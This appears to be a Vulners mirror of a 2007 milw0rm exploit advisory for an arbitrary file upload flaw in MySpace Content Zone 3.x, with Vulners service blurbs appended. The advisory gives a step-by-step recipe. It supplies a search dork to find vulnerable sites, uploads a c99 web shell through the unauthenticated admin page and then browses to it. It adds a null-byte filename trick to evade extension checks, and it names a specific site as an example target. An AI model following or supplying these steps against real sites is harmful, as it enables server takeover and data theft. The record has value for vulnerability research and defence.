Vulners
Lucene search
MySpace Content Zone 3.x - Arbitrary File Upload
----------------------------------------------------
[+-MySpace Content Zone RFi-+]
----------------------------------------------------
Found By Don & breaker_unit
----------------------------------------------------
Vuln file: /admin/uploadgames.php
Fix: secure admin area
Dork: "Powered by MySpace Content Zone"
go to /admin/uploadgames.php
example:
http://www.virtualdynamite.com/admin/uploadgames.php
and upload your shell - lets say it is named as c99.php
ok, now go to /uploads/thumb/c99.php
like: http://www.virtualdynamite.com/uploads/flash/c99.php
and - what you see ?? :xD
your shell!
Note1: you can add .php%00.jpeg cause %00 = null
Note2: it takes awhile to upload a shell sometimes!
Creditz to breaker_unit, h4cky0u.org and str0ke!
Don is wishing Happy Holidays to all of you reading this!
Cheers!
# milw0rm.com [2007-12-18]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Dec 2007 00:00Current
7High risk
Vulners AI Score7